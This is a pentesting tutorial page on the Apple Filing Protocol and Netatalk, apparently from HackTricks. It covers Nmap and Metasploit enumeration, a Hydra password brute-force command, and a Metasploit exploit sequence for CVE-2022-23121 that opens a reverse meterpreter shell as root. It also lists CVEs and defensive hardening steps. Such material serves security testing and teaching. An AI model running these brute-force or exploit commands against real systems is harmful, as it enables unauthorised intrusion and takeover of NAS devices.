584-pentesting-afp.md (8668B)
1 --- 2 title: "548 - Pentesting Apple Filing Protocol (AFP)" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/584-pentesting-afp.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/584-pentesting-afp.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # 548 - Pentesting Apple Filing Protocol (AFP) 14 15 ## Basic Information 16 17 The **Apple Filing Protocol** (**AFP**), formerly AppleTalk Filing Protocol, provides file services for classic Mac OS and macOS. AFP supports Unicode filenames, POSIX-style and ACL permissions, resource forks, named extended attributes, and Mac-oriented file locking. 18 19 Although AFP has been superseded by SMB in modern macOS releases (SMB is the default since OS X 10.9), it is still encountered in: 20 21 * Legacy macOS / Mac OS 9 environments 22 * NAS appliances (QNAP, Synology, Western Digital, TrueNAS…) that embed the open-source **Netatalk** daemon 23 * Mixed-OS networks where Time-Machine-over-AFP is still enabled 24 25 **Default TCP Port:** **548** (AFP over TCP / DSI) 26 27 ```bash 28 PORT STATE SERVICE 29 548/tcp open afp 30 ``` 31 32 --- 33 34 ## Enumeration 35 36 ### Quick banner / server info 37 38 ```bash 39 # Metasploit auxiliary 40 use auxiliary/scanner/afp/afp_server_info 41 run RHOSTS=<IP> 42 43 # Nmap NSE 44 nmap -p 548 -sV --script "afp-* and not dos" <IP> 45 ``` 46 47 Useful AFP NSE scripts include the following:<sup>[[5]](#references)</sup> 48 49 | Script | What it does | 50 |--------|--------------| 51 | **afp-ls** | List available AFP volumes and files | 52 | **afp-brute** | Password brute-force against AFP login | 53 | **afp-serverinfo** | Dump server name, machine type, AFP version, supported UAMs, etc. | 54 | **afp-showmount** | List shares together with their ACLs | 55 | **afp-path-vuln** | Detects (and can exploit) directory-traversal, CVE-2010-0533 | 56 57 The NSE brute-force script can be combined with Hydra/Medusa if more control is required: 58 59 ```bash 60 hydra -L users.txt -P passwords.txt afp://<IP> 61 ``` 62 63 If you already have credentials, **Nmap's AFP scripts become much more useful** because `afp-serverinfo` leaks the advertised **UAMs** (auth methods), while `afp-showmount` and `afp-ls` can enumerate reachable shares, ACLs and interesting files: 64 65 ```bash 66 nmap -p 548 --script afp-serverinfo,afp-showmount,afp-ls \ 67 --script-args 'afp.username=<USER>,afp.password=<PASS>,ls.maxdepth=2,ls.maxfiles=50' <IP> 68 ``` 69 70 Pay attention to: 71 72 * **Machine Type: Netatalk** in `afp-serverinfo` output, which usually means a NAS / Unix host rather than Apple's own AFP implementation. 73 * **UAMs** such as `DHX`, `DHX2`, `Cleartxt` or `Guest`, because they directly hint at the reachable login paths and whether legacy / weak auth is enabled. 74 * **Share ACLs** from `afp-showmount`; world-readable or drop-box style shares often expose backups, `.appl` files, and user metadata before you ever mount the volume. 75 76 ### Interacting with shares 77 78 *macOS* 79 ```bash 80 # Finder → Go → "Connect to Server…" 81 # or from terminal 82 mkdir /Volumes/afp 83 mount_afp afp://USER:[email protected]/SHARE /Volumes/afp 84 ``` 85 86 *Linux* (using `afpfs-ng` ‑ packaged in most distros) 87 ```bash 88 apt install afpfs-ng 89 mkdir /mnt/afp 90 mount_afp afp://USER:[email protected]/SHARE /mnt/afp 91 # or interactive client 92 afp_client <IP> 93 ``` 94 95 Once mounted, remember that classic Mac resource-forks are stored as hidden `._*` AppleDouble files – these often hold interesting metadata that DFIR tools miss. 96 97 On Netatalk targets this metadata backend also matters for exploitability: 98 99 * `ea = ad` means metadata is stored in **AppleDouble v2** files / `.AppleDouble` directories. 100 * `ea = sys` or `ea = samba` stores metadata in filesystem extended attributes instead. 101 * In **Netatalk 4.2+** the old `appledouble` option was removed and the backend is controlled solely through the `ea` option.<sup>[[4]](#references)</sup> 102 103 From an offensive perspective, this lets you quickly decide whether **AppleDouble-oriented bugs** are more likely to be reachable on the server. 104 105 --- 106 107 ## Common Vulnerabilities & Exploitation 108 109 ### Netatalk unauthenticated RCE chain (2022) 110 111 Several NAS vendors shipped **Netatalk ≤3.1.12**. A lack of bounds checking in `parse_entries()` allows an attacker to craft a malicious **AppleDouble** header and obtain **remote root** before authentication (**CVSS 9.8 – CVE-2022-23121**). A full write-up by NCC Group with PoC exploiting Western-Digital PR4100 is available.<sup>[[1]](#references)</sup> 112 113 Metasploit (>= 6.3) ships the module `exploit/linux/netatalk/parse_entries` which delivers the payload via DSI `WRITE`. 114 115 ```bash 116 use exploit/linux/netatalk/parse_entries 117 set RHOSTS <IP> 118 set TARGET 0 # Automatic (Netatalk) 119 set PAYLOAD linux/x64/meterpreter_reverse_tcp 120 run 121 ``` 122 123 If the target runs an affected QNAP/Synology firmware, successful exploitation yields a shell as **root**. 124 125 ### Netatalk OpenSession heap overflow (2018) 126 127 Older Netatalk (3.0.0 - 3.1.11) is vulnerable to an out-of-bounds write in the **DSI OpenSession** handler allowing unauthenticated code execution (**CVE-2018-1160**). A detailed analysis and PoC were published by Tenable Research.<sup>[[2]](#references)</sup> 128 129 ### Newer Netatalk attack surface (2022-2024) 130 131 Recent Netatalk advisories show that the attack surface is no longer limited to `parse_entries()` and OpenSession handling:<sup>[[3]](#references)</sup> 132 133 * **CVE-2022-45188**: a specially crafted `.appl` file can trigger a heap overflow in `afp_getappl`; this is especially relevant if you can **write files into a share** and the server runs FCE / notify features. 134 * **CVE-2023-42464**: a **type confusion** bug in the **Spotlight RPC** handlers can become reachable when `spotlight = yes` is enabled in `afp.conf` (disabled by default). 135 * **CVE-2024-38439 / CVE-2024-38440 / CVE-2024-38441**: one-byte heap out-of-bounds writes in login-related paths fixed in **Netatalk 2.4.1 / 3.1.19 / 3.2.1**. These bugs are interesting because exploitability depends on the configured **UAMs**: 136 * `uams_clrtxt.so` + PAM-backed ClearTxt login exposes the `FPLoginExt` path relevant to **CVE-2024-38439**. 137 * `uams_dhx.so` + PAM-backed DHX login reaches the vulnerable path for **CVE-2024-38440**. 138 * `uams_guest.so` keeps the **Guest** login path reachable for **CVE-2024-38441**. 139 140 This means the output of `afp-serverinfo` is not just fingerprinting data; it helps you decide which **login parser** is exposed before spending time on exploit development or NAS firmware triage. 141 142 ### Other notable issues 143 144 * **CVE-2022-22995** – Symlink redirection leading to arbitrary file write / RCE when AppleDouble v2 is enabled (3.1.0 - 3.1.17). 145 * **CVE-2010-0533** – Directory traversal in Apple Mac OS X 10.6 AFP (detected by `afp-path-vuln.nse`). 146 * Multiple memory-safety bugs were fixed again during the **2024 Netatalk releases**; if you identify `Netatalk` in `afp-serverinfo`, spend a minute correlating the exposed UAMs / Spotlight / metadata backend with the server version before assuming only the 2018/2022 bugs matter.<sup>[[3]](#references)</sup> 147 148 --- 149 150 ## Defensive Recommendations 151 152 1. **Disable AFP** unless strictly required – use SMB3 or NFS instead. 153 2. If AFP must stay, use a currently supported Netatalk release or vendor firmware that backports all relevant fixes. Version 3.1.18 is a useful historical marker for several 2022–2024 fixes, but it is not a blanket minimum because later vulnerabilities required 3.1.19 or newer; maintained 4.x releases are preferable where compatible.<sup>[[3]](#references)</sup><sup>[[4]](#references)</sup> 154 3. Enforce **Strong UAMs** (e.g. *DHX2*), disable clear-text and guest logins. 155 4. Restrict TCP 548 to trusted subnets and wrap AFP inside a VPN when exposed remotely. 156 5. Periodically scan with `nmap -p 548 --script afp-*` in CI/CD to catch rogue / downgraded appliances. 157 158 --- 159 160 ### [Brute-Force](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-hacking/brute-force.md#afp) 161 162 163 ## References 164 165 - [1] [Netatalk Security Advisory CVE-2022-23121 – "Arbitrary code execution in parse_entries"](https://netatalk.io/security/CVE-2022-23121) 166 - [2] [Tenable Research – "Exploiting an 18-Year-Old Bug (CVE-2018-1160)"](https://medium.com/tenable-techblog/exploiting-an-18-year-old-bug-b47afe54172) 167 - [3] [Netatalk Security Advisories index](https://netatalk.io/security.html) 168 - [4] [Netatalk 4.2.0 Release Notes](https://netatalk.io/4.2/ReleaseNotes4.2.0) 169 - [5] [Nmap NSE documentation – AFP scripts](https://nmap.org/nsedoc/scripts/)